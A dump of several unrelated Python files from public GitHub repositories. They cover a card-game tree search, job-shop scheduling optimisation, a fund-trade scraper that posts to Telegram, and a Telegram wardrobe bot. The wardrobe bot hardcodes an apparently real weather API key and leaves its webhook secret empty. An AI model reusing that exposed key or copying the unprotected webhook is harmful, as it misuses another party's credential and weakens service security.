encoding='utf8')\n f.write(yaml.dump(data_geo, Dumper=Dumper))\n f.close()\n\n@app.command()\ndef identify(text):\n \"\"\"Identifies license by text provided. Very slow and ineffective. Temporary solution test license mapping for Common Data Index\"\"\"\n themes= {}\n f = open(RULES_THEME_FILE, 'r', encoding='utf8')\n themes_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in themes_data:\n themes[row['key']] = row['topics']\n\n geo = {}\n f = open(RULES_GEO_FILE, 'r', encoding='utf8')\n geo_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in geo_data:\n geo[row['key']] = row['topics']\n \n\n notfound = True\n if text in themes.keys():\n print('Topics for text %s: %s' % (text, ','.join(themes[text])))\n notfound = False \n if text in geo.keys():\n print('Geo topics for text %s: %s' % (text, ','.join(geo[text])))\n notfound = False \n if notfound:\n print('Topics not found')\n\nif __name__ == \"__main__\":\n app()","repo_name":"commondataio/cdi-topicmapper","sub_path":"scripts/topicmapper.py","file_name":"topicmapper.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72484378999","text":"from collections import defaultdict\nimport numpy as np\nfrom threading import Timer\nfrom jass.game import game_state_util\nfrom jass.game.game_sim import GameSim\nfrom jass.game.game_state import GameState\nfrom jass.game.rule_schieber import RuleSchieber\nfrom numpy import ndarray\n\n\nclass DMCTSNode:\n\n def __init__(self, game_state: GameState, player_number, parent=None, parent_action=None):\n self.game_state = game_state\n self.player_number = player_number\n self.parent = parent\n self.parent_action = parent_action\n self.children = []\n self.visits_count = 0\n self.results = defaultdict(int)\n self.win_score = 0\n self.rule = RuleSchieber()\n self.game_sim = GameSim(RuleSchieber())\n self.untried_actions = None\n self.__get_untried_actions()\n\n def __get_untried_actions(self) -> ndarray:\n valid_cards = self.rule.get_valid_actions_from_obs(\n game_state_util.observation_from_state(self.game_state, self.player_number))\n self.untried_actions = np.flatnonzero(valid_cards)\n return self.untried_actions\n\n def best_action(self, iteration_budget: int) -> int:\n iteration_counter = 0\n while (iteration_counter < iteration_budget):\n v = self.__tree_policy()\n reward = v.rollout()\n v.backpropagate(reward)\n iteration_counter += 1\n return self.__best_child().parent_action\n\n def __tree_policy(self):\n current_node = self\n while not current_node.is_terminal_node():\n if not current_node.__is_fully_expanded():\n return current_node.expand()\n else:\n current_node = current_node.__best_child()\n return current_node\n\n def rollout(self) -> int:\n self.game_sim.init_from_state(self.game_state)\n while not self.game_sim.is_done():\n # possible_moves = ruleSchieber.get_valid_actions_from_obs(gameSim.get_observation())\n possible_moves = self.rule.get_valid_cards(self.game_sim.get_observation().hand,\n self.game_sim.get_observation().current_trick,\n self.game_sim.get_observation().nr_cards_in_trick,\n self.game_sim.get_observation().trump)\n action = self.__rollout_policy(possible_moves)\n self.game_sim.action_play_card(action)\n\n points = self.game_sim.state.points\n return 1 if points[0] > points[1] else 0\n\n def difference_win_loss(self):\n wins = self.results[1]\n loses = self.results[-1]\n return wins - loses\n\n def expand(self):\n action, self.untried_actions = self.untried_actions[-1], self.untried_actions[:-1]\n # Initilize GameSim with state\n self.game_sim.init_from_state(self.game_state)\n self.game_sim.action_play_card(action)\n child_node = DMCTSNode(self.game_state, self.player_number, parent=self, parent_action=action)\n self.children.append(child_node)\n return child_node\n\n @staticmethod\n def __rollout_policy(possible_moves):\n return possible_moves[np.random.randint(len(possible_moves))]\n\n def __increment_visits(self):\n self.visits_count += 1\n\n def is_terminal_node(self):\n return self.game_state.nr_played_cards == 36\n\n def backpropagate(self, result):\n self.visits_count += 1\n self.results[result] += 1\n if self.parent:\n self.parent.backpropagate(result)\n\n def __is_fully_expanded(self):\n return len(self.untried_actions) == 0\n\n def __best_child(self, c_param=0.5):\n choices_weights = [(c.difference_win_loss() / c.visits_count) + c_param * np.sqrt(\n (np.log(self.visits_count) / c.visits_count)) for c in self.children]\n return self.children[np.argmax(choices_weights)]\n","repo_name":"dave1b/DL4G","sub_path":"determination_monte_carlo_tree_search/dmcts_node.py","file_name":"dmcts_node.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43963335356","text":"import json\nimport re\nfrom json import JSONDecodeError\nimport yaml\n\n\ndef write_to_file(path, ls) -> None:\n \"\"\"\n Write retrieved data to file.\n Parameters\n ----------\n retrieved_data_path : str\n Path to file where data is stored\n ls : list\n List of dictionaries containing retrieved data\n \"\"\"\n if ls != None:\n try:\n with open(path, \"r\") as f:\n json_file = json.load(f)\n except FileNotFoundError as e:\n json_file = []\n except JSONDecodeError:\n json_file = []\n\n json_file.append(ls)\n\n with open(path, \"w\") as f:\n json.dump(json_file, f, indent=4)\n else:\n pass\n\n\n# Function to count the number of words between quotation marks\n# This is used to count the number of words in the query\n# This is necessary because the OPS API has a limit of 20 words (terms) per query\ndef count_words_between_quotes(request):\n word_count = 0\n # Regex to find all phrases between quotation marks\n phrases = re.findall(r'\"(.*?)\"', request)\n for phrase in phrases:\n # Splitting each phrase by space to count words\n word_count += len(phrase.split())\n return word_count\n\n\ndef load_config(path: str) -> dict:\n with open(path, \"r\") as stream:\n config = yaml.safe_load(stream)\n return config\n","repo_name":"Jonasrg/BT_AI","sub_path":"source/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71250065402","text":"#wap to enter two seperate distances in meters and centimeters and print their sum\n#10m 25cm + 12m 95cm = 23m 20cm\n\n\nfirst_m = int(input(\"enter the first length in m: \"))\nfirst_cm = int(input(\"enter the first length in cm: \"))\n\nsecond_m = int(input(\"enter the second length in m: \"))\nsecond_cm = int(input(\"enter the second length in cm: \"))\n\n\nadd_m = first_m + second_m\nadd_cm = first_cm + second_cm\n\nif first_cm < 100 and second_cm < 100:\n if add_cm >= 100:\n add_m += 1\n add_cm = add_cm - 100\n print(\"total length after calculation is: \" +str(add_m) + \" m and \" + str(add_cm) + \" cm\")\n elif add_cm < 100:\n print(\"total length after calculation is: \" +str(add_m) + \" m and \" + str(add_cm) + \" cm\")\n\n\n\n\n\n\n","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_2/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73289493240","text":"import math\nimport pandas as pd\nimport numpy as np\nimport sys, math, time\nfrom pathlib import Path\nfrom fcmaes import retry, advretry, mode, modecpp, moretry\nfrom fcmaes.optimizer import Bite_cpp, Cma_cpp, De_cpp, de_cma, dtime, Differential_evolution\nfrom scipy.optimize import Bounds\nimport ctypes as ct\nimport multiprocessing as mp \nfrom numba import njit, numba\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport sys \nfrom loguru import logger\n\nlogger.remove()\nlogger.add(sys.stdout, format=\"{time:HH:mm:ss.SS} | {process} | {level} | {message}\")\nlogger.add(\"log_{time}.txt\")\n\ndef read_fjs(filename):\n inf = 1000000\n with open(filename) as f:\n lines = f.readlines()\n first_line = lines[0].split()\n n_jobs = int(first_line[0])\n n_machines = int(first_line[1])\n nb_operations = [int(lines[j + 1].split()[0]) for j in range(n_jobs)]\n n_operations = np.sum(nb_operations)\n nb_tasks = sum(nb_operations[j] for j in range(n_jobs))\n processing_time = [[inf for m in range(n_machines)] for t in range(nb_tasks)]\n # For each job, for each operation, the corresponding task id\n operation_task = [[0 for o in range(nb_operations[j])] for j in range(n_jobs)]\n sum_time = 0\n id = 0\n for j in range(n_jobs):\n line = lines[j + 1].split()\n tmp = 0\n for o in range(nb_operations[j]):\n n_machines_operation = int(line[tmp + o + 1])\n for i in range(n_machines_operation):\n machine = int(line[tmp + o + 2 * i + 2]) - 1\n time = int(line[tmp + o + 2 * i + 3])\n processing_time[id][machine] = time\n sum_time += time\n operation_task[j][o] = id\n id += 1\n tmp += 2 * n_machines_operation\n tasks = []\n for job in range(n_jobs):\n jtasks = operation_task[job]\n for task in jtasks:\n times = processing_time[task]\n for machine in range(n_machines):\n time = times[machine]\n if time < inf:\n tasks.append((job, task, machine, time))\n \n return np.array(tasks), n_jobs, n_machines, n_operations, sum_time\n\ndef gantt(data):\n df = pd.DataFrame.from_dict(data)\n df['duration']=df.end-df.start \n p_start=df.start.min()\n p_end=df.end.max()\n p_duration=(p_end-p_start+1)\n df['rel_start']=df.start.apply(lambda x: (x-p_start))\n x_ticks=[i for i in range(int(p_duration+1))]\n x_labels=[(p_start+i) for i in x_ticks] \n plt.figure(figsize=(8,4))\n cols = sns.color_palette()\n machines = list(df.machine) \n mi = np.argsort(machines) \n y = 0\n last = machines[mi[0]]\n for i in mi:\n if machines[i] != last:\n last = machines[i]\n y += 1\n plt.barh(y='M' + str(machines[i]), left=df.rel_start[i], \n width=df.duration[i], color=cols[df.job[i] % len(cols)])\n plt.text(x=df.rel_start[i], y=y, s = str(df.task[i]))\n plt.gca().invert_yaxis()\n plt.xticks(ticks=x_ticks, labels=x_labels)\n plt.title('Gantt Chart')\n plt.xticks(rotation=60)\n plt.grid(axis='x', alpha=0.5)\n plt.savefig('gantt.png')\n plt.show()\n\ndef scheduling(tasks, n_jobs, n_machines):\n machine_time = np.zeros(n_machines)\n job_time = np.zeros(n_jobs)\n solution = {'machine': [], 'start': [], 'end': [], 'job': [], 'task':[]}\n for task in tasks:\n job = int(task[0])\n machine = int(task[2])\n time = task[3]\n # previous task needs to be finished and machine needs to be available\n start = max(machine_time[machine], job_time[job])\n end = start + time\n machine_time[machine] = end\n job_time[job] = end \n solution['machine'].append(int(machine))\n solution['start'].append(int(start))\n solution['end'].append(int(end))\n solution['job'].append(int(job))\n solution['task'].append(int(task[1]))\n return solution\n\ndef chart(tasks, n_jobs, n_machines):\n solution = scheduling(tasks, n_jobs, n_machines)\n logger.info(solution)\n gantt(solution)\n \n@njit(fastmath=True) \ndef job_indices(tasks):\n indices = []\n ids = []\n n = tasks.shape[0]\n j = 0\n last = tasks[0]\n indices.append(j)\n for i in range(n+1):\n if i == n or tasks[i][0] != last[0] or tasks[i][1] != last[1]: # new operation\n ids.append(last[0])\n if (i < n and tasks[i][0] != last[0]):\n indices.append(j+1)\n j += 1\n if i < n: \n last = tasks[i]\n return np.array(indices), np.array(ids)\n\n@njit(fastmath=True) \ndef reorder(tasks, order, n_operations, job_ids, job_indices):\n ids = job_ids[order]\n ordered = np.empty((n_operations,4))\n op_index = np.zeros(n_operations, dtype=numba.int32)\n for i in range(n_operations):\n machine = ids[i]\n index = job_indices[machine] + op_index[machine]\n op_index[machine] += 1\n ordered[i] = tasks[index]\n return ordered\n \n@njit(fastmath=True) \ndef exec_tasks(tasks, n_jobs, n_machines):\n machine_time = np.zeros(n_machines)\n machine_work_time = np.zeros(n_machines)\n job_time = np.zeros(n_jobs)\n for task in tasks:\n job = int(task[0])\n machine = int(task[2])\n time = task[3]\n # previous task needs to be finished and machine needs to be available\n end_time = max(machine_time[machine], job_time[job]) + time\n machine_time[machine] = end_time\n job_time[job] = end_time \n machine_work_time[machine] += time\n #print(\"exec job {0} task {1} machine {2} start {3} end {4}\".format(job, int(task[1]), machine, end_time-time, end_time))\n return machine_time, job_time, machine_work_time\n\n@njit(fastmath=True) \ndef filter_tasks(x, tasks, n_operations, n_machines):\n n = tasks.shape[0]\n operations = np.empty((n_operations,4))\n j = 0\n last = tasks[0]\n last_i = 0\n for i in range(n+1):\n if i == n or tasks[i][0] != last[0] or tasks[i][1] != last[1]: # new operation\n m = i - last_i\n sel_i = int(x[j]*10*n_machines) % m\n selected = tasks[last_i + sel_i]\n operations[j,:] = selected\n last_i = i\n j += 1\n if i < n: \n last = tasks[i]\n return operations\n\n@njit(fastmath=True)\ndef filtered_tasks(x, task_data, n_operations, n_machines, job_indices, job_ids):\n operations = filter_tasks(x, task_data, n_operations, n_machines)\n order = np.argsort(x[n_operations:])\n tasks = reorder(operations, order, n_operations, job_ids, job_indices)\n return tasks\n\nclass fitness: \n\n def __init__(self, task_data, bounds, n_jobs, n_operations, n_machines, name):\n self.evals = mp.RawValue(ct.c_long, 0) # writable across python processes\n self.best_y = mp.RawValue(ct.c_double, np.inf) # writable across python processes\n self.t0 = time.perf_counter()\n self.task_data = task_data \n self.n_jobs = n_jobs\n self.n_operations = n_operations\n self.n_machines = n_machines \n self.bounds = bounds\n self.name = name\n self.nobj = 3\n self.ncon = 0\n self.weights = np.array([1.0, 0.02, 0.001]) # only used for single objective optimization\n self.job_indices, self.job_ids = job_indices(task_data)\n \n def chart(self, x):\n tasks = filtered_tasks(x, self.task_data, self.n_operations, self.n_machines,\n self.job_indices, self.job_ids)\n chart(tasks, self.n_jobs, self.n_machines)\n \n def fun(self, x): # multi objective function \n tasks = filtered_tasks(x, self.task_data, self.n_operations, self.n_machines,\n self.job_indices, self.job_ids)\n machine_time, job_time, machine_work_time = exec_tasks(tasks, self.n_jobs, self.n_machines)\n span = np.amax(machine_time)\n work = np.sum(machine_work_time)\n wmax = np.amax(machine_work_time)\n ys = np.array([span, work, wmax]) \n y = sum(self.weights*ys) # weighted sum \n self.evals.value += 1\n if y < self.best_y.value:\n self.best_y.value = y \n logger.info(\"evals = {0}: time = {1:.1f} y = {2:.2f} s = {3:.0f} w = {4:.0f} m = {5:.0f} m= {6:s} j= {7:s} w= {8:s}\"\n .format(self.evals.value, dtime(self.t0), y, span, work, wmax,\n str([int(si) for si in machine_time]),\n str([int(oi) for oi in job_time]),\n str([int(oi) for oi in machine_work_time]),\n ))\n return ys \n\n def __call__(self, x): # single objective function \n ys = self.fun(x)\n return sum(self.weights*ys) # weighted sum \n \ndef optall(multi_objective = True):\n for i in range(1,16):\n optimize(i, multi_objective)\n\ndef optimize(bi, multi_objective = True): \n name = \"BrandimarteMk\" + str(bi)\n tasks, n_jobs, n_machines, n_operations, _ = read_fjs(\"data/1_Brandimarte/\" + name + \".fjs\")\n \n dim = 2*n_operations\n lower_bound = np.zeros(dim)\n lower_bound[:] = 0.0000001 \n upper_bound = np.zeros(dim)\n upper_bound[:] = 0.9999999\n bounds = Bounds(lower_bound, upper_bound)\n \n fit = fitness(tasks, bounds, n_jobs, n_operations, n_machines, name)\n if multi_objective:\n xs, front = modecpp.retry(fit.fun, fit.nobj, fit.ncon, fit.bounds, num_retries=32, popsize = 48, \n max_evaluations = 960000, nsga_update = True, workers=16)\n logger.info(name + \" modecpp.retry(num_retries=32, popsize = 48, max_evals = 960000, nsga_update = True, workers=16\" )\n logger.info(str([tuple(y) for y in front]))\n else: \n store = retry.Store(fit, bounds) \n logger.info(name + \" Bite_cpp(960000,M=1).minimize, num_retries=256)\" )\n retry.retry(store, Bite_cpp(960000,M=1).minimize, num_retries=256) \n \n return fit, xs\n \ndef main():\n #optall(multi_objective = True)\n fit, xs = optimize(1, multi_objective = True)\n fit.chart(xs[0]) \n \nif __name__ == '__main__':\n main()","repo_name":"dietmarwo/fast-cma-es","sub_path":"examples/jobshop.py","file_name":"jobshop.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"40"} +{"seq_id":"41138660592","text":"#!/usr/bin/python3.9\n\nfrom lxml import html \nfrom datetime import datetime, timedelta \nfrom dateutil import parser \n\nimport requests \nimport cx_Oracle \nimport json \n\nexec(open('config.py').read())\n\ndef get_last_trade_date(): \n sql = \"select max(trade_date) from ark_trade\" \n cursor = conn.cursor() \n cursor.execute(sql) \n lastdate, = cursor.fetchone() \n cursor.close() \n return lastdate\n\ndef save_trade(arkTrade, lastdate):\n parm={\n \"ticker\": \"A\",# None,\n \"date\": None,\n \"shares\": None,\n \"weight\": None,\n \"fund\": None,\n \"direction\": None,\n \"hidden\": None}\n\n for atk in arkTrade.keys():\n parm[atk]=arkTrade.get(atk)\n\n parm[\"date\"] = parser.parse(parm.get(\"date\")[0:10])\n\n if (parm[\"date\"] > lastdate):\n sql = \"\"\"insert into ark_trade\n (ticker , trade_date, shares, weight,\n fund, direction, hidden) values \n (:1, :2, :3, :4, :5, :6, :7)\"\"\"\n #(:ticker , :date, :shares, weight, \n # :fund, :direction, :hidden) \"\"\"\n\n cursor = conn.cursor()\n cursor.execute(sql, [\n parm.get(\"ticker\"), \n parm.get(\"date\"),\n int(parm.get(\"shares\")),\n float(parm.get(\"weight\")),\n parm.get(\"fund\"),\n parm.get(\"direction\"),\n parm.get(\"hidden\")])\n\n cursor.close()\n conn.commit()\n\ndef notify_trade():\n sql = \"\"\"\n /*with function theoffset return number\n as\n oset number; \n begin\n select trunc(sysdate)-max(trade_date) into oset from ark_trade;\n return oset;\n end;\n */\n with last_info as (\n select trunc(sysdate)-max(trade_date) theoffset,\n max(trade_date) last_date\n from ark_trade\n )\n select last_date, listagg(distinct direction, '/') within group \n (order by direction) directions,\n t.ticker || ': ' ||\n sum((dir_value+1)*days_within_1)/2 || ',' ||\n -sum((dir_value-1)*days_within_1)/2 || ',' ||\n sum(shares*dir_value*days_within_1) || '; ' ||\n sum((dir_value+1)*days_within_7)/2 || ',' ||\n -sum((dir_value-1)*days_within_7)/2 || ',' ||\n sum(shares*dir_value*days_within_7) || '; ' ||\n sum((dir_value+1)*days_within_31)/2 || ',' ||\n -sum((dir_value-1)*days_within_31)/2 || ',' ||\n sum(shares*dir_value*days_within_31) || '; ' ||\n listagg(distinct fund, ',') within group (order by fund) rec\n from (\n select last_date, t.*,\n case when trade_date > sysdate-1-theoffset \n then 1 else 0 end days_within_1,\n case when trade_date > sysdate-7-theoffset \n then 1 else 0 end days_within_7,\n case when trade_date > sysdate-31-theoffset \n then 1 else 0 end days_within_31,\n decode(direction, 'Buy', 1, 'Sell', -1) dir_value\n from ark_trade t, last_info\n where trade_date > sysdate-31-theoffset\n ) t\n group by last_date, ticker\n having sum(days_within_1) > 0\n order by directions\n \"\"\"\n cursor = conn.cursor()\n cursor.execute(sql)\n prevdir=\"\"\n message = \"\"\n for last_date, direction, details in cursor:\n if direction != prevdir:\n if prevdir != \"\":\n message=\"```\\n\" + prevdir + \" Operations 31 days within \" + str(last_date) + \": \\r\" + message + \"\\n```\"\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&parse_mode=MarkdownV2&text=\" + message\n page = requests.get(request_url)\n message =\"\"\n prevdir = direction \n message = message + \"\\n\" + details \n\n if message != \"\": \n message=\"```\\n\" + prevdir + \" Operations 31 days within \" + str(last_date) + \": \\r\" + message + \"\\n```\"\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&parse_mode=MarkdownV2&text=\" + message\n page = requests.get(request_url)\n\ndef notify_trade_old(lastdate):\n sql = \"\"\"select direction, ticker,\n listagg(fund) within group (order by fund) funds, sum(shares) total_shares, count(*) num_trades\n from ark_trade\n where trade_date>:1\n group by direction, ticker\n order by direction, ticker\"\"\"\n\n cursor = conn.cursor()\n cursor.execute(sql, [lastdate])\n #cursor.execute(sql)\n for direction, ticker, funds, total_shares, num_trades in cursor:\n message=direction + \",\" + ticker + \",\" + str(total_shares) + \",\" + str(num_trades)\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&text=\" + message\n page = requests.get(request_url)\n\n print(message)\n\n cursor.close()\n\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&text=\" + \"Sent trades since \" + str(lastdate)\n page = requests.get(request_url)\n print(request_url)\n return lastdate\n\n\n\ndef get_update_id(tbody, fund):\n ribbon = tbody.xpath('//div[@class=\"ant-ribbon-wrapper\"]')\n\n update_date = parser.parse(ribbon[0].xpath('//div[contains(@class, \"ant-ribbon-placement-end\")]')[0].text, fuzzy=True) + timedelta(hours=8)\n\n\n#update_id_wrapper = cursor.var(cx_Oracle.NUMBER)\n#sql_params = { \"update_id\" : update_id_wrapper }\n#sql = \"insert into ark_update_tbl ( update_date ) values (sysdate) \" + \\\n# \"returning update_id into :update_id\"\n#cursor.execute(sql, sql_params)\n#update_id=update_id_wrapper.getvalue()\n\n#print(update_id[0])\n\n cursor = conn.cursor()\n sql = \"select count(*) from ark_update_tbl \" + \\\n \"where update_date=:update_date \" + \\\n \"and fund = :fund\"\n cursor.execute(sql, (update_date, fund))\n c, = cursor.fetchone()\n cursor.close()\n\n if c > 0:\n return -1\n\n\n cursor = conn.cursor()\n update_id_wrapper = cursor.var(cx_Oracle.NUMBER)\n sql_params = { \"update_date\": update_date, \n \"fund\": fund, \n \"update_id\" : update_id_wrapper }\n update_id = -1\n sql = \"insert into ark_update_tbl ( update_date, fund ) values \" + \\\n \"(:update_date, :fund) \" + \\\n \"returning update_id into :update_id\"\n cursor.execute(sql, sql_params)\n update_id = update_id_wrapper.getvalue()\n cursor.close()\n\n print (update_id)\n return update_id[0]\n \n\ndef capture_holdings(fund, start_col):\n url=\"https://cathiesark.com/\" + fund + \"/complete-holdings\"\n if fund == \"ark-funds-combined\":\n fund = \"COMBINED\"\n else:\n fund = fund.upper()\n \n \n page = requests.get(url)\n tree = html.fromstring(page.content)\n\n tbody = tree.xpath('//tbody')[0]\n\n jsontext = tree.xpath('//script[@id=\"__NEXT_DATA__\"]')[0].text\n pp = json.loads(jsontext).get(\"props\").get(\"pageProps\")\n\n\n\n for k in pp.keys():\n print(k)\n maxposcnt = -1\n maxposkey = \"\"\n if k == \"DISABLEarkPositions\":\n print (k, \": \")\n #f = open(\"arkPositionsKeys.txt\", \"a\")\n f = open(\"arkPositionsKeys_nxpi.txt\", \"w\")\n for i in range(0, len(pp.get(k))-1):\n arkPos = pp.get(k)[i]\n # Step 1: Check Key list\n #for apk in arkPos.keys():\n # f.write(apk + '\\n')\n # Step 2: Check ticker with most keys\n #if len(arkPos) > maxposcnt:\n # maxposcnt = len(arkPos)\n # maxposkey = arkPos.get(\"ticker\")\n # Step 3: List keys\n # Table will be created based on this\n if arkPos.get(\"ticker\") == \"NXPI\":\n for apk in arkPos.keys():\n f.write(apk + '\\n')\n f.close()\n print(maxposkey + \": \" + str(maxposcnt))\n\n if k == \"arkTrades\":\n print (k, \": \")\n last_date = get_last_trade_date()\n for i in range(0, len(pp.get(k))-1):\n arkPos = pp.get(k)[i]\n save_trade(arkPos, last_date)\n\n #notify_trade_old(last_date)\n notify_trade()\n# for kk in arkPos.keys():\n# for kk in arkPos.keys():\n# print (kk, arkPos.get(kk))\n\n \n# else:\n# print (k, pp.get(k))\n\nconn = cx_Oracle.connect(\"\", \"\", dbconnect)\ncapture_holdings(\"ark-funds-combined\", 1)\n\n\n","repo_name":"tsangsir/ArkTracker","sub_path":"capture_cathieark.py","file_name":"capture_cathieark.py","file_ext":"py","file_size_in_byte":8716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71619237240","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nfrom flask import request\n\nfrom models import User, Clothes\n\nfrom app import db, app\n\nfrom func import func\n\nfrom values import values, types\n\nimport pyowm\n\nimport os\n\ntoken = os.environ.get('TELEGRAM_TOKEN', '')\nbot = telebot.TeleBot(token, threaded=False)\n\nURL = 'https://api.telegram.org/bot' + token + '/'\nsecret = ''\nurl = 'https://3b3b95dc.ngrok.io' + secret\n# bot.remove_webhook()\n# bot.set_webhook(url=url)\nstates = {'start': 1, 'init': 2, 'query': 3, 'add': 4, 'city': 5, 'del': 6}\n\nmarkup = telebot.types.ReplyKeyboardMarkup(one_time_keyboard=False, resize_keyboard=True)\nitembtn1 = telebot.types.KeyboardButton('Получить список одежды')\nitembtn2 = telebot.types.KeyboardButton('Добавит предмет в гардероб')\nitembtn3 = telebot.types.KeyboardButton('Удалить предмет')\nitembtn4 = telebot.types.KeyboardButton('Установить город')\nitembtn5 = telebot.types.KeyboardButton('Подобрать одежду на сегодня')\nmarkup.row(itembtn1, itembtn2)\nmarkup.row(itembtn3, itembtn4)\nmarkup.row(itembtn5)\n\nowm = pyowm.OWM('370baafacdbb4a1468e5cef4e6c46a5e')\n\n\n@app.route('/' + secret, methods=['POST'])\ndef webhook():\n update = telebot.types.Update.de_json(request.stream.read().decode('utf-8'))\n bot.process_new_updates([update])\n return 'ok', 200\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user = User.query.filter(User.id == message.chat.id).first()\n if user is None:\n user = User(message.chat.id, message.chat.username)\n user.state = states['start']\n\n try:\n db.session.add(user)\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id,\n 'что-то пошло не так')\n return\n\n bot.send_message(message.chat.id,\n f'Здравствуйте, {user.username}. Пожалуйста, введите имеющийся у Вас гардероб в'\n f' формате <Цвет Вид одежды> так, чтобы каждый предмет находился на новой строке')\n\n\n@bot.message_handler(\n func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['start'] or\n User.query.filter(User.id == message.chat.id).first().state == states['add']\n)\ndef init(message):\n user = User.query.filter(User.id == message.chat.id).first()\n text = message.text\n items = text.split('\\n')\n for item in items:\n new_item = item.split()\n\n if len(new_item) != 2:\n bot.send_message(message.chat.id, 'введите, пожалуйста, все вещи в правильном формате')\n user.state = states['add']\n db.session.commit()\n return\n\n exist = False\n for typ in types:\n if new_item[1] in types[typ]:\n exist = True\n break\n\n if not exist:\n bot.send_message(message.chat.id, 'такой вещи не бывает')\n user.state = states['add']\n db.session.commit()\n return\n\n cloth = Clothes.query.filter_by(color=new_item[0]).filter_by(kind=new_item[1]).first()\n if cloth is None:\n clothes = Clothes(new_item[0], new_item[1])\n for typ in types:\n if new_item[1] in types[typ]:\n clothes.clothes_type = typ\n clothes.points = values[new_item[1]]\n break\n try:\n user.clothes.append(clothes)\n user.state = states['init']\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id, 'что-то пошло не так')\n return\n else:\n try:\n user.clothes.append(cloth)\n user.state = states['init']\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id, 'что-то пошло не так')\n return\n\n bot.send_message(message.chat.id, 'Вещи успешно добавлены в гардероб', reply_markup=markup)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Получить список одежды')\ndef get_clothes(message):\n user = User.query.filter(User.id == message.chat.id).first()\n clothes = user.clothes\n for clothe in clothes:\n bot.send_message(message.chat.id, clothe, reply_markup=markup)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Добавит предмет в гардероб')\ndef add_item_invite(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.state = states['add']\n db.session.commit()\n bot.send_message(message.chat.id,\n 'Пожалуйста, введите имеющийся у Вас гардероб в'\n ' формате <Цвет Вид одежды> так, чтобы каждый предмет находился на новой строке')\n\n\n@bot.message_handler(func=lambda message: message.text == 'Установить город')\ndef city(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.state = states['city']\n db.session.commit()\n bot.send_message(message.chat.id, 'Пожалуйста, введите город')\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['city'])\ndef add_city(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.city = message.text\n user.state = states['init']\n db.session.commit()\n bot.send_message(message.chat.id, 'Город успешно добавлен')\n\n\n@bot.message_handler(func=lambda message: message.text == \"Подобрать одежду на сегодня\")\ndef clothes(message):\n user = User.query.filter(User.id == message.chat.id).first()\n if user.city is None:\n bot.send_message(message.chat.id, 'Пожалуйста, установите город, нажав на кнопку'\n ' \"Установить город\"')\n return\n\n clothes = user.clothes\n weather = owm.weather_at_place(f'{user.city},Russia')\n w = weather.get_weather()\n temperature = w.get_temperature(\"celsius\")[\"temp\"]\n print(temperature)\n detail_status = w.get_detailed_status()\n new_clothes = func(temperature, clothes)\n for item in new_clothes:\n bot.send_message(message.chat.id, f'{item}')\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['init']\n and message.text=='Удалить предмет')\ndef delete(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.state = states['del']\n clothes = user.clothes\n for clothe in clothes:\n bot.send_message(message.chat.id, str(clothe.id) + '. ' + str(clothe), reply_markup=markup)\n bot.send_message(message.chat.id, 'Пожалуйста, введите номера проедметов из списка через пробел'\n ' или ввведите -1, чтобы удалить все')\n db.session.commit()\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['del'])\ndef delete_clothes(message):\n user = User.query.filter(User.id == message.chat.id).first()\n if message.text == str(-1):\n user.clothes = []\n user.state = states['init']\n db.session.commit()\n bot.send_message(message.chat.id, 'Успешно удалены все вещи')\n return\n\n try:\n nums = [int(num) for num in message.text.split()]\n except ValueError:\n user.state = states['init']\n db.session.commit()\n bot.send_message(message.chat.id, 'Неверный ввод')\n return\n clothes = user.clothes\n for num in nums:\n clo = list(filter(lambda cl: cl.id == num, clothes))[0]\n clothes.remove(clo)\n\n user.state = states['init']\n db.session.commit()\n bot.send_message(message.chat.id, 'Предмет удалён')\n\n\n\n","repo_name":"JoelPagliuca/clothes","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18486668084","text":"# -*- coding: utf-8 -*-\nimport toolforge\nimport json\nimport datetime\nfrom config import domains, siteData\n\ndef doCatQueery(category, namespace):\n return \"select count(cl_from) as number from categorylinks where cl_to='%s' and cl_from in (select page_id from page where page_namespace=%s)\" % (\n category, namespace)\n\n\ndef updateJson(domain, num_allpages, num_q0, num_q1, num_q2, num_q3q4, num_q4, num_main_allpages, main_withscan,\n main_withoutscan, main_apg, page_aps):\n\n with 